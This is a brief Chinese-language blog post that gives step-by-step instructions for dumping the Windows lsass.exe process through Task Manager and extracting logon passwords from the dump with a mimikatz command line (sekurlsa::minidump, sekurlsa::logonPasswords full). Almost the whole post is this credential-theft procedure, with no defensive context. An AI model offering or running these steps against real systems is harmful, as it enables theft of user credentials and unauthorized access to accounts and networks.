转储获取Windows密码

在公众号上看到的,研究了一下


过程如下:
打开任务管理器 lsass.exe进程,然后选择注册转储文件


然后把lass.dump 弄到本机,放到mimikatz目录下
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

发表评论 / Comment

提示:本文章评论功能已关闭